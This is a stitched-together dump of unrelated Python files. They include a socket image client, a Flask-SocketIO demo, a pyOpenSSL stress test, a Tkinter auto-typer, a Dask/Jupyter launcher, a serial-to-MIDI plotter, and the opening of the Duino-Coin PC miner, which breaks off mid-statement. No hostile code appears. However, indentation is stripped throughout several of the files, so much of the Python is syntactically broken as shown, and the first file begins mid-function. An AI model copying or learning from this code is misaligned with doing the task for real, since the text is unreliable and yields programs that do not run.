self._handler.saveImg(self._cnt)
self._buffers[0] = POJO(ab_pixmap, self._handler.get_candidate())
self._notify_event.set()
else:
print "没有被判定可用的图像--"
else:
print "还没处理完,你再等会儿----"
utils.set_label_pic(self._window.video, photo)
if self._updated_abnormal_pic:
self._updated_abnormal_pic = False
self.update_show()
else:
self._warning_timer.stop()
else:
            self._cap.release()
def load_config(self):
        self.config = ConfigInjection()  # load the configuration file to obtain the stream address
self.config.load_configuration()
self.streamAddr = self.config.streamAddr
def load_socket_config(self):
address = (self.config.address, self.config.port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(address)
    # Update the abnormal-image display
def update_show(self):
for i in range(2):
if self._abnormal_pics[i] != None:
utils.set_label_pic(self._abnormal_labels[i], self._abnormal_pics[i])
            # update the text shown in self._window.ablabel3
self._window.ablabel3.setText(_translate("Form",
self._abnormal_type[self._abnormal_index], None))
# self._warning_timer.start(500)
    # Initialise member variables
def eles_init(self):
self._images = []
        self._step2_processed = True  # flag: second processing stage finished
        self._pojo_changed = False
        self._click_flag = False  # toggles the Start button text
        self._vals = []  # stores the processing output value of each image
        self._buffers = []
        self._buffers.append(None)
        self._handler = CaculateHandler(self.config)  # first-stage image processing handler
self._cnt = 0
self._abnormal_rois = None
self._updated_abnormal_pic = False
self._is_real_normal = False
self._cnt_flag = 0
self._draw_index = 0
def warning(self):
if self._window.ablabel3.styleSheet().isEmpty():
self._window.ablabel3.setStyleSheet(_fromUtf8("border:5px solid red;"))
else:
self._window.ablabel3.setStyleSheet(_fromUtf8(""))
def send_msg(self):
while True:
self._notify_event.wait()
print "我要开始处理啦-----"
self._pojo_changed = False
self._save_obj = self._buffers[0]
            # send the image to the server
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]
result, img_encode = cv2.imencode('.jpg', self._save_obj.img, encode_param)
data = np.array(img_encode)
send_data = data.tostring()
self.sock.send(str(len(send_data)).ljust(16))
self.sock.send(send_data)
            # send the corresponding problem ROI region markers
if len(self._abnormal_rois) == 0:
for j in range(16):
self._abnormal_rois.append(j)
            roi_strs = [str(i) for i in self._abnormal_rois]
            tmp_str = ",".join(roi_strs)  # e.g. "1,2,3,4"
self.sock.sendall(str(len(tmp_str)).ljust(16))
self.sock.send(tmp_str)
self.rece_msg()
print "数据发送失败,请重新开始发送"
self.sock.close()
def rece_msg(self):
ss = self.sock.recv(32)
print "返回的结果---", ss
rec_data=str(ss).split("/")
index = int(rec_data[1])
if 4 != index:
self._abnormal_index = index
            #utils.update_list(self._abnormal_pics, self._save_obj.ab_pixmap)  # update the abnormal list
draws = rec_data[2:]
draws = [int(i) for i in draws]
print "需要画出的区域有--",draws
utils.update_list(self._abnormal_pics, self._handler.recs_draw(draws,self._save_obj.img))
self._updated_abnormal_pic = True
else:
self._updated_abnormal_pic = False
self._step2_processed = True
self._notify_event.clear()
def checkIsBackGround(self):
self._handler.check_bg()
self.postImgs = []
# window close
def close_window(self):
self.sock.close()
self._main_timer.stop()
self._window.close()
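# Illustrative sketch of the receiving side of the protocol used in send_msg()
# above: every payload is preceded by its length encoded as a 16-byte,
# space-padded ASCII field. This helper is an assumption about the peer, not
# code from the original project.
def example_recv_payload(sock):
    header = sock.recv(16)
    length = int(header.strip())
    payload = b""
    while len(payload) < length:
        chunk = sock.recv(length - len(payload))
        if not chunk:
            break
        payload += chunk
    return payload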
|
time.py
|
#!/usr/bin/env python3
import redis
import time
import os
import argparse
import threading
from flask_socketio import SocketIO
from flask import Flask, render_template, session, request, \
copy_current_request_context
args = None
r = None
th = None
app = Flask(__name__)
@app.route('/')
def index():
host = request.host.split(':')[0]
return render_template('time.html', scheme=request.scheme, host=host)
def sysinfo():
socketio = SocketIO(message_queue=args.redis)
while True:
data = {
'time': int(time.time())
}
socketio.emit('update', data, room='time')
time.sleep(1)
def main():
global args, r, th
    def_address = 'localhost:7788'
    def_redis = os.getenv('REDIS') or 'redis://localhost:6379/0'
parser = argparse.ArgumentParser(description='time ws-emit demo')
parser.add_argument('-v', dest='verbose', action='store_true',
default=False, help='verbose mode')
parser.add_argument('--redis', default=def_redis,
help=f'redis URL. Def: {def_redis}')
parser.add_argument('-a', '--address', default=def_address,
help=f'bind to this Address. Def: {def_address}')
args = parser.parse_args()
r = redis.Redis.from_url(args.redis)
th = threading.Thread(target=sysinfo, args=())
th.daemon = True
th.start()
addr = args.address.split(':')
app.run(host=addr[0], port=int(addr[1]))
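# Illustrative sketch (not part of the original script): the web process that
# serves time.html would typically create its own SocketIO(app, message_queue=...)
# instance and put connecting clients into the 'time' room so that the emits in
# sysinfo() reach them. The handler below is an assumption about that process.
def example_register_time_room(socketio_server):
    from flask_socketio import join_room
    @socketio_server.on('connect')
    def _on_connect():
        join_room('time')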
if __name__ == '__main__':
    main()
|
context-passphrase-callback.py
|
# Copyright (C) Jean-Paul Calderone
# See LICENSE for details.
#
# Stress tester for thread-related bugs in global_passphrase_callback in
# src/ssl/context.c. In 0.7 and earlier, this will somewhat reliably
# segfault or abort after a few dozen to a few thousand iterations on an SMP
# machine (generally not on a UP machine) due to uses of Python/C API
# without holding the GIL.
from itertools import count
from threading import Thread
from OpenSSL.SSL import Context, TLSv1_METHOD
from OpenSSL.crypto import TYPE_RSA, FILETYPE_PEM, PKey, dump_privatekey
k = PKey()
k.generate_key(TYPE_RSA, 128)
file('pkey.pem', 'w').write(dump_privatekey(FILETYPE_PEM, k, "blowfish", "foobar"))
count = count()
def go():
def cb(a, b, c):
print count.next()
return "foobar"
c = Context(TLSv1_METHOD)
c.set_passwd_cb(cb)
while 1:
c.use_privatekey_file('pkey.pem')
threads = [Thread(target=go, args=()) for i in xrange(2)]
for th in threads:
th.start()
for th in threads:
th.join()
|
autoTyperGUI.py
|
#!/bin/python3
import tkinter as tk
import tkinter.scrolledtext as scrolledtext
from tkinter import messagebox
import webbrowser
import time
import multiprocessing
import sys
def typing(delay, interval, data):
    delay = int(delay)
    interval = float(interval)  # Entry widgets return strings; pyautogui expects a number
    time.sleep(delay)
    import pyautogui
    pyautogui.FAILSAFE = False
    pyautogui.write(data, interval=interval)
def start_typing():
global t1
t1 = multiprocessing.Process(target=typing, args=(ent_delay.get(), ent_interval.get(), txt_box.get("1.0", tk.END)))
t1.start()
messagebox.showinfo("Message", "Click on the Window where you want text to be typed.")
def stop_typing():
t1.terminate()
t1.join()
sys.stdout.flush()
def exit_program():
sys.exit()
def select_all(event):
txt_box.tag_add(tk.SEL, "1.0", tk.END)
txt_box.mark_set(tk.INSERT, "1.0")
txt_box.see(tk.INSERT)
return 'break'
def callback(url):
webbrowser.open_new(url)
def create_about_window():
about_window = tk.Toplevel(window)
about_window.title("About")
lbl_name = tk.Label(text="Version - Auto Typer 1.0", master=about_window, font='Helvetica 15')
lbl_name.grid(row=0, column=0, pady=(15,5), padx=10)
lbl_developer = tk.Label(text="Developer - Parvesh Monu", master=about_window, font='Helvetica 10')
lbl_developer.grid(row=1, column=0, pady=5, padx=10)
lbl_twitter = tk.Label(text="Follow - https://twitter.com/parveshmonu", master=about_window, font='Helvetica 10', fg="blue", cursor="hand2")
lbl_twitter.grid(row=2, column=0, pady=5, padx=10)
lbl_twitter.bind("<Button-1>", lambda e: callback("https://twitter.com/parveshmonu"))
lbl_github = tk.Label(text="Github - https://github.com/Parveshdhull", master=about_window, font='Helvetica 10', fg="blue", cursor="hand2")
lbl_github.grid(row=3, column=0, pady=5, padx=10,)
lbl_github.bind("<Button-1>", lambda e: callback("https://github.com/Parveshdhull"))
lbl_youtube= tk.Label(text="YouTube - https://youtube.com/right2trick", master=about_window, font='Helvetica 10', fg="blue", cursor="hand2")
lbl_youtube.grid(row=4, column=0, pady=10, padx=10,)
lbl_youtube.bind("<Button-1>", lambda e: callback("https://youtube.com/right2trick"))
buy_coffee = tk.Button(text="Buy me a coffee", master=about_window)
buy_coffee.grid(row=5,column=0, padx=10, pady=(10,20))
buy_coffee.bind("<Button-1>", lambda e: callback("https://www.buymeacoffee.com/parveshmonu"))
about_window.mainloop()
def configure_weight():
# frm_params
frm_params.columnconfigure(0, weight=1)
frm_params.columnconfigure(1, weight=1)
frm_params.rowconfigure(0, weight=1)
frm_params.rowconfigure(1, weight=1)
# frm_buttons
frm_buttons.columnconfigure(0, weight=1)
frm_buttons.columnconfigure(1, weight=1)
frm_buttons.columnconfigure(2, weight=1)
frm_buttons.rowconfigure(0, weight=1)
# main window
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
window.rowconfigure(1, weight=1)
window.rowconfigure(2, weight=1)
window.rowconfigure(3, weight=1)
window.rowconfigure(4, weight=1)
def create_main_window():
window.title("Auto Typer")
# Params Frame
global frm_params
frm_params = tk.Frame()
frm_params.grid(row=0,column=0)
# Delay
lbl_delay = tk.Label(text="Inital Delay (In Sec)", master=frm_params)
lbl_delay.grid(row=0,column=0, padx=50, pady=5)
global ent_delay
ent_delay = tk.Entry(justify='center', master=frm_params)
ent_delay.insert(0, "10")
ent_delay.grid(row=1,column=0, padx=50)
# Interval
lbl_interval = tk.Label(text="Interval (In Sec)", master=frm_params)
lbl_interval.grid(row=0,column=1, padx=50, pady=5)
global ent_interval
ent_interval = tk.Entry(justify='center', master=frm_params)
ent_interval.insert(0, "0.07")
ent_interval.grid(row=1,column=1, padx=50)
# Data
lbl_data = tk.Label(text="Paste Text Here", font='Helvetica 18 bold' )
lbl_data.grid(row=3,column=0, pady=(10,2))
global txt_box
txt_box = scrolledtext.ScrolledText(window, undo=True)
txt_box.grid(row=4,column=0)
txt_box.bind("<Control-Key-a>", select_all)
txt_box.bind("<Control-Key-A>", select_all)
# Buttons Frame
global frm_buttons
frm_buttons = tk.Frame()
frm_buttons.grid(row=5,column=0)
# Start
start = tk.Button(text="Start", master=frm_buttons, command=start_typing)
start.grid(row=0,column=0, padx=10, pady=10)
# Stop
start = tk.Button(text="Stop", master=frm_buttons, command=stop_typing)
start.grid(row=0,column=1, padx=10, pady=10)
# Exit
start = tk.Button(text="Exit", master=frm_buttons, command=exit_program)
start.grid(row=0,column=2, padx=10, pady=10)
# About
start = tk.Button(text="About", command=create_about_window)
start.grid(row=6,column=0, padx=10, pady=10)
configure_weight()
window.mainloop()
if __name__ == '__main__':
multiprocessing.freeze_support()
window = tk.Tk()
create_main_window()
|
synchronization_between_processes.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: https://docs.python.org/3.6/library/multiprocessing.html#synchronization-between-processes
from multiprocessing import Process, Lock
import time
def f(lock, i):
with lock:
print('hello world', i)
time.sleep(1)
if __name__ == '__main__':
lock = Lock()
for num in range(10):
Process(target=f, args=(lock, num)).start()
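# Illustrative variant (not in the original example): keeping references to the
# Process objects lets the parent wait for all workers to finish.
def run_with_join():
    lock = Lock()
    procs = [Process(target=f, args=(lock, num)) for num in range(10)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()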
|
startDask.py
|
import os
import argparse
import time
from dask.distributed import Client
import sys, uuid
import threading
import subprocess
import socket
import mlflow
from notebook.notebookapp import list_running_servers
def flush(proc, proc_log):
while True:
proc_out = proc.stdout.readline()
if proc_out == "" and proc.poll() is not None:
proc_log.close()
break
elif proc_out:
sys.stdout.write(proc_out)
proc_log.write(proc_out)
proc_log.flush()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--jupyter_token", default=uuid.uuid1().hex)
parser.add_argument("--script")
args, unparsed = parser.parse_known_args()
for k, v in os.environ.items():
if k.startswith("MLFLOW"):
print(k, v)
MLFLOW_RUN_ID = os.getenv("MLFLOW_RUN_ID")
print(
"- env: AZ_BATCHAI_JOB_MASTER_NODE_IP: ",
os.environ.get("AZ_BATCHAI_JOB_MASTER_NODE_IP"),
)
print(
"- env: AZ_BATCHAI_IS_CURRENT_NODE_MASTER: ",
os.environ.get("AZ_BATCHAI_IS_CURRENT_NODE_MASTER"),
)
print("- env: AZ_BATCHAI_NODE_IP: ", os.environ.get("AZ_BATCHAI_NODE_IP"))
print("- env: AZ_BATCH_HOST_LIST: ", os.environ.get("AZ_BATCH_HOST_LIST"))
print("- env: AZ_BATCH_NODE_LIST: ", os.environ.get("AZ_BATCH_NODE_LIST"))
print("- env: MASTER_ADDR: ", os.environ.get("MASTER_ADDR"))
print("- env: MASTER_PORT: ", os.environ.get("MASTER_PORT"))
print("- env: RANK: ", os.environ.get("RANK"))
print("- env: LOCAL_RANK: ", os.environ.get("LOCAL_RANK"))
print("- env: NODE_RANK: ", os.environ.get("NODE_RANK"))
print("- env: WORLD_SIZE: ", os.environ.get("WORLD_SIZE"))
rank = os.environ.get("RANK")
ip = socket.gethostbyname(socket.gethostname())
master = os.environ.get("MASTER_ADDR")
master_port = os.environ.get("MASTER_PORT")
print("- my rank is ", rank)
print("- my ip is ", ip)
print("- master is ", master)
print("- master port is ", master_port)
scheduler = master + ":8786"
dashboard = master + ":8787"
print("- scheduler is ", scheduler)
print("- dashboard is ", dashboard)
print("args: ", args)
print("unparsed: ", unparsed)
print("- my rank is ", rank)
print("- my ip is ", ip)
if not os.path.exists("logs"):
os.makedirs("logs")
print("free disk space on /tmp")
os.system(f"df -P /tmp")
if str(rank) == "0":
mlflow.log_param("headnode", ip)
mlflow.log_param(
"cluster",
"scheduler: {scheduler}, dashboard: {dashboard}".format(
scheduler=scheduler, dashboard=dashboard
),
)
cmd = (
"jupyter lab --ip 0.0.0.0 --port 8888"
+ " --NotebookApp.token={token}"
+ " --allow-root --no-browser"
).format(token=args.jupyter_token)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
jupyter_log = open("logs/jupyter_log.txt", "w")
jupyter_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
jupyter_flush = threading.Thread(target=flush, args=(jupyter_proc, jupyter_log))
jupyter_flush.start()
# while not list(list_running_servers()):
# time.sleep(5)
# jupyter_servers = list(list_running_servers())
# assert (len(jupyter_servers) == 1), "more than one jupyter server is running"
mlflow.log_param(
"jupyter", "ip: {ip_addr}, port: {port}".format(ip_addr=ip, port="8888")
)
mlflow.log_param("jupyter-token", args.jupyter_token)
cmd = (
"dask-scheduler "
+ "--port "
+ scheduler.split(":")[1]
+ " --dashboard-address "
+ dashboard
)
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
scheduler_log = open("logs/scheduler_log.txt", "w")
scheduler_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
scheduler_flush = threading.Thread(
target=flush, args=(scheduler_proc, scheduler_log)
)
scheduler_flush.start()
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
worker_flush = threading.Thread(target=flush, args=(worker_proc, worker_log))
worker_flush.start()
if args.script:
command_line = " ".join(["python", args.script] + unparsed)
print("Launching:", command_line)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
driver_log = open("logs/driver_log.txt", "w")
driver_proc = subprocess.Popen(
command_line.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
driver_flush = threading.Thread(
target=flush, args=(driver_proc, driver_log)
)
driver_flush.start()
# Wait until process terminates (without using p.wait())
# while driver_proc.poll() is None:
# # Process hasn't exited yet, let's wait some
# time.sleep(0.5)
print("waiting for driver process to terminate")
driver_proc.wait()
exit_code = driver_proc.returncode
print("process ended with code", exit_code)
print("killing scheduler, worker and jupyter")
jupyter_proc.kill()
scheduler_proc.kill()
worker_proc.kill()
exit(exit_code)
else:
flush(scheduler_proc, scheduler_log)
else:
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
flush(worker_proc, worker_log)
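# Illustrative sketch (not part of the original script): dask.distributed.Client
# is imported above but never used here; a driver script launched via --script
# would typically connect to the scheduler started above roughly like this.
# The address argument follows the "<MASTER_ADDR>:8786" convention used above.
def example_connect_to_cluster(scheduler_address):
    client = Client(scheduler_address)  # e.g. "10.0.0.4:8786" (placeholder)
    print(client)
    return client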
|
server copy.py
|
from threading import Thread
import serial
import time
import collections
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import colors
import struct
import copy
import pandas as pd
import numpy as np
from scipy import interpolate
import mido
class serialPlot:
def __init__(self, serialPort='COM6', serialBaud=9600, dataLength=100, dataNumBytes=2, numData=1):
self.port = serialPort
self.baud = serialBaud
self.plotMaxLength = dataLength
self.dataNumBytes = dataNumBytes
self.numData = numData
self.rawData = bytearray(numData * dataNumBytes)
self.dataType = None
self.midoOutports = mido.get_output_names()
print("Connecting to MIDI port:", self.midoOutports[1])
self.midiOutport = mido.open_output(self.midoOutports[1])
#[F2,G#2, C3, C#3, D#3, F3, G#3]
self.notes = [41, 44, 48, 49, 51, 53, 56]
self.note_status = [False, False, False, False, False, False, False]
        if dataNumBytes == 2:
            self.dataType = 'H'  # 2 byte unsigned integer
        elif dataNumBytes == 4:
            self.dataType = 'f'  # 4 byte float ('F' is not a valid struct format character)
self.data = []
for i in range(numData): # give an array for each type of data and store them in a list
self.data.append(collections.deque([0] * dataLength, maxlen=dataLength))
self.isRun = True
self.isReceiving = False
self.thread = None
self.plotTimer = 0
self.previousTimer = 0
# self.csvData = []
print('Trying to connect to: ' + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
try:
self.serialConnection = serial.Serial(serialPort, serialBaud, timeout=4)
print('Connected to ' + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
except:
print("Failed to connect with " + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
def readSerialStart(self):
if self.thread == None:
self.thread = Thread(target=self.backgroundThread)
self.thread.start()
# Block till we start receiving values
while self.isReceiving != True:
time.sleep(0.1)
def getSerialData(self, frame, ax, fig, figNumber, maxDataLength):
currentTimer = time.perf_counter()
self.plotTimer = int((currentTimer - self.previousTimer) * 1000) # the first reading will be erroneous
self.previousTimer = currentTimer
privateData = copy.deepcopy(self.rawData[:]) # so that the 3 values in our plots will be synchronized to the same sample time
# unpack and decode incoming data and add to variable data
for i in range(self.numData):
data = privateData[(i*self.dataNumBytes):(self.dataNumBytes + i*self.dataNumBytes)]
value, = struct.unpack(self.dataType, data)
self.data[i].append(value) # we get the latest data point and append it to our array
# print("\r",self.data[1][-1],"\t",self.data[0][-1], end="")
self.azimut = np.asarray(self.data[1])*np.pi/180
self.radius = np.asarray(self.data[0])
if (figNumber == 1):
plt.figure(fig.number)
ax.clear()
# define binning: 0m to 4m with steps of 12.5cm (32 steps)
self.rbins = np.linspace(0,400, 40)
self.abins = np.linspace(-0.1,2*np.pi-0.1, 40)
self.hist, _ , _ = np.histogram2d(self.azimut, self.radius, bins=(self.abins, self.rbins), density=True)
self.A, self.R = np.meshgrid(self.abins, self.rbins)
self.pc = ax.pcolormesh(self.A, self.R, self.hist.T, cmap="magma")
# self.interp_hist = interpolate.interp2d(self.abins[:-1],self.rbins[:-1],self.hist.T,kind='linear')
# define interpolation binning
# self.rbins_interp = np.linspace(20,400, 40*4)
# self.abins_interp = np.linspace(0.0,2*np.pi, 40*4)
# self.A_interp, self.R_interp = np.meshgrid(self.abins_interp, self.rbins_interp)
# self.hist_interp = self.interp_hist(self.abins_interp,self.rbins_interp)
# self.pc = ax.pcolormesh(self.A_interp, self.R_interp, self.hist_interp, cmap="magma")
# ax.set_rmax(400)
ax.set_rorigin(20)
if (figNumber == 2):
plt.figure(fig.number)
ax[0].clear()
ax[1].clear()
# self.weights_radius = np.ones_like(self.radius)/maxDataLength
self.weights_radius = np.ones_like(self.radius)/np.max(self.radius)
self.N_azimuth, self.bins_azimut, self.patches_azimuth = ax[0].hist(self.data[1],bins=range(-4,365-4,9))
self.N_radius, self.bins_radius, self.patches_radius = ax[1].hist(self.radius,bins=np.linspace(20,300,8), weights=self.weights_radius)
ax[1].set_ylim(0,1)
# We'll color code by height, but you could use any scalar
self.fracs = self.N_radius
# we need to normalize the data to 0..1 for the full range of the colormap
self.norm = colors.Normalize(self.fracs.min(), self.fracs.max())
# Now, we'll loop through our objects and set the color of each accordingly
for thisfrac, thispatch in zip(self.fracs, self.patches_radius):
color = plt.cm.gist_yarg(self.norm(thisfrac))
thispatch.set_facecolor(color)
for i in range(0,np.shape(self.fracs)[0]):
if (self.fracs[i] > 0.00001 ):
self.midi_msg = mido.Message('note_on', note=self.notes[i], channel=i)
self.midiOutport.send(self.midi_msg)
print("Note on", self.notes[i])
self.note_status[i] = True
self.midi_msg = mido.Message('note_off', note=self.notes[i], channel=i)
time.sleep(0.5)
self.midiOutport.send(self.midi_msg)
# self.midi_msg = mido.Message('control_change', channel=i, control=0, value=int(self.N_radius[i]*127), time=0)
# self.midi_msg = mido.Message('control_change', channel=i, control=0, value=int(127), time=0)
# self.midiOutport.send(self.midi_msg)
# print('CC channel',i+1,'value',int(self.N_radius[i]*127))
elif (self.fracs[i] < 0.00001 ):
self.midi_msg = mido.Message('note_off', note=self.notes[i], channel=i)
self.midiOutport.send(self.midi_msg)
# print("Note off", self.notes[i])
self.note_status[i] = False
def backgroundThread(self): # retrieve data
time.sleep(1.0) # give some buffer time for retrieving data
self.serialConnection.reset_input_buffer()
while (self.isRun):
self.serialConnection.readinto(self.rawData)
self.isReceiving = True
# print(self.rawData)
def close(self):
self.isRun = False
self.thread.join()
self.serialConnection.close()
print('Disconnected...')
# df = pd.DataFrame(self.csvData)
# df.to_csv('/home/rikisenia/Desktop/data.csv')
def main():
# portName = 'COM10'
portName = 'COM6'
# portName = '/dev/ttyUSB0'
baudRate = 115200
    # The Arduino sends a stream of data consisting of 1,...,numData information classes,
    # each one dataNumBytes long. A rolling buffer of maxDataLength data points is stored.
maxDataLength = 100 # number of real time data points
dataNumBytes = 2 # number of bytes of 1 data point
numData = 2 # number of data information classes in 1 datapoint
s = serialPlot(portName, baudRate, maxDataLength, dataNumBytes, numData) # initializes all required variables
s.readSerialStart() # starts background thread
# plotting starts below
pltInterval = 50 # Period at which the plot animation updates [ms]
xmin = 0
xmax = maxDataLength
ymin = 0
ymax = 700
fig = plt.figure(facecolor='k', figsize=(1500,1500))
ax = fig.add_subplot(111, projection='polar')
ax.set_frame_on(False)
ax.tick_params(axis='x', colors='white')
ax.tick_params(axis='y', colors='white')
fig1 = plt.figure(facecolor='w', figsize=(400,800))
ax1 = fig1.add_subplot(211)
ax2 = fig1.add_subplot(212)
anim = animation.FuncAnimation(fig, s.getSerialData, fargs=(ax, fig, 1, maxDataLength), interval=pltInterval) # fargs has to be a tuple
anim1 = animation.FuncAnimation(fig1, s.getSerialData, fargs=((ax1,ax2), fig1, 2, maxDataLength), interval=pltInterval) # fargs has to be a tuple
plt.show()
s.close()
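# Illustrative helper (not part of the original script): each serial frame read
# into self.rawData holds numData values of dataNumBytes bytes each, which
# getSerialData() unpacks one value at a time with struct. The same frame can
# be decoded in a single call; the format characters follow the
# dataNumBytes -> 'H' / 'f' mapping assumed in serialPlot.__init__.
def decode_frame(raw, num_data=2, data_num_bytes=2):
    fmt = {2: 'H', 4: 'f'}[data_num_bytes]
    return struct.unpack(fmt * num_data, raw)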
if __name__ == '__main__':
main()
|
PC_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official PC Miner 3.1 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2022
"""
from threading import Semaphore
from time import time, sleep, strptime, ctime
from hashlib import sha1
from socket import socket
from multiprocessing import cpu_count, current_process
from multiprocessing import Process, Manager
from threading import Thread
from datetime import datetime
from random import randint
from os import execl, mkdir, _exit
from subprocess import DEVNULL, Popen, check_call, PIPE
import pip
import sys
import base64 as b64
import os
import json
import zipfile
import requests
from pathlib import Path
from re import sub
from random import choice
from platform import machine as osprocessor
from platform import python_version_tuple
from platform import python_version
from signal import SIGINT, signal
from locale import getdefaultlocale
from configparser import ConfigParser
configparser = ConfigParser()
printlock = Semaphore(value=1)
# Python <3.6 check: the bare f-string below is a syntax error on older
# interpreters, so startup fails early with a readable message in the traceback.
f"Your Python version is too old. Duino-Coin Miner requires version 3.6 or above. Update your packages and try again"
def handler(signal_received, frame):
"""
Nicely handle CTRL+C exit
"""
if current_process().name == "MainProcess":
pretty_print(
get_string("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ get_string("goodbye"),
"warning")
if sys.platform == "win32":
_exit(0)
else:
Popen("kill $(ps awux | grep PC_Miner | grep -v grep | awk '{print $2}')", shell=True, stdout=PIPE)
def install(package):
"""
Automatically installs python pip package and restarts the program
"""
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
import cpuinfo
except ModuleNotFoundError:
print("Cpuinfo is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install py-cpuinfo")
install("py-cpuinfo")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
try:
import psutil
except ModuleNotFoundError:
print("Psutil is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install psutil")
install("psutil")
class Settings:
"""
Class containing default miner and server settings
"""
ENCODING = "UTF8"
SEPARATOR = ","
VER = 3.1
DATA_DIR = "Duino-Coin PC Miner " + str(VER)
TRANSLATIONS = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
TRANSLATIONS_FILE = "/Translations.json"
SETTINGS_FILE = "/Settings.cfg"
TEMP_FOLDER = "Temp"
SOC_TIMEOUT = 15
REPORT_TIME = 5*60
DONATE_LVL = 0
try:
# Raspberry Pi latin users can't display this character
"‖".encode(sys.stdout.encoding)
BLOCK = " ‖ "
except:
BLOCK = " | "
PICK = ""
COG = " @"
if (os.name != "nt"
or bool(os.name == "nt"
and os.environ.get("WT_SESSION"))):
# Windows' cmd does not support emojis, shame!
        # Some codecs don't support them either, for example the Latin-1 encoding
try:
"⛏ ⚙".encode(sys.stdout.encoding) # if the terminal support emoji
PICK = " ⛏"
COG = " ⚙"
except UnicodeEncodeError: # else
PICK = ""
COG = " @"
def check_updates():
"""
Function that checks if the miner is updated.
Downloads the new version and restarts the miner.
"""
try:
git_json = requests.get("https://api.github.com/repos/revoxhere/duino-coin/releases/latest")
data = json.loads(git_json.text) # Get latest version
zip_file = "Duino-Coin_" + data["tag_name"] + "_linux.zip"
if sys.platform == "win32":
zip_file = "Duino-Coin_" + data["tag_name"] + "_windows.zip"
process = psutil.Process(os.getpid())
running_script = False # If the process is from script
if "python" in process.name():
running_script = True
if float(Settings.VER) < float(data["tag_name"]): # If is outdated
update = input(Style.BRIGHT + get_string("new_version"))
if update == "Y" or update == "y":
pretty_print(get_string("updating"), "warning", "sys")
DATA_DIR = "Duino-Coin PC Miner " + str(data["tag_name"]) # Create new version config folder
if not Path(DATA_DIR).is_dir():
mkdir(DATA_DIR)
                try:
configparser.read(str(Settings.DATA_DIR) + '/Settings.cfg') # read the previous config
configparser["PC Miner"] = {
"username": configparser["PC Miner"]["username"],
"mining_key": configparser["PC Miner"]["mining_key"],
"intensity": configparser["PC Miner"]["intensity"],
"threads": configparser["PC Miner"]["threads"],
"start_diff": configparser["PC Miner"]["start_diff"],
"donate": int(configparser["PC Miner"]["donate"]),
"identifier": configparser["PC Miner"]["identifier"],
"algorithm": configparser["PC Miner"]["algorithm"],
"language": configparser["PC Miner"]["language"],
"soc_timeout": int(configparser["PC Miner"]["soc_timeout"]),
"report_sec": int(configparser["PC Miner"]["report_sec"]),
"discord_rp": configparser["PC Miner"]["discord_rp"]
}
with open(str(DATA_DIR) # save it on the new version folder
+ '/Settings.cfg', 'w') as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
except Exception as e:
print(Style.BRIGHT + "There is a error trying to save the config file: " + str(e))
print("The config file isn't saved on the new version folder")
if not os.path.exists(Settings.TEMP_FOLDER): # Make the Temp folder
os.makedirs(Settings.TEMP_FOLDER)
file_path = os.path.join(Settings.TEMP_FOLDER, zip_file)
download_url = "https://github.com/revoxhere/duino-coin/releases/download/" + data["tag_name"] + "/" + zip_file
if running_script:
file_path = os.path.join(".", "PC_Miner_"+data["tag_name"]+".py")
download_url = "https://raw.githubusercontent.com/revoxhere/duino-coin/master/PC_Miner.py"
r = requests.get(download_url, stream=True)
if r.ok:
start = time()
dl = 0
file_size = int(r.headers["Content-Length"]) # Get file size
print("Saving to", os.path.abspath(file_path))
with open(file_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024 * 8): # Download file in chunks
if chunk:
dl += len(chunk)
done = int(50 * dl / file_size)
dl_perc = str(int(100 * dl / file_size))
if running_script:
done = int(12.5 * dl / file_size)
dl_perc = str(int(22.5 * dl / file_size))
sys.stdout.write(
"\r%s [%s%s] %s %s" % (
dl_perc + "%",
'#' * done,
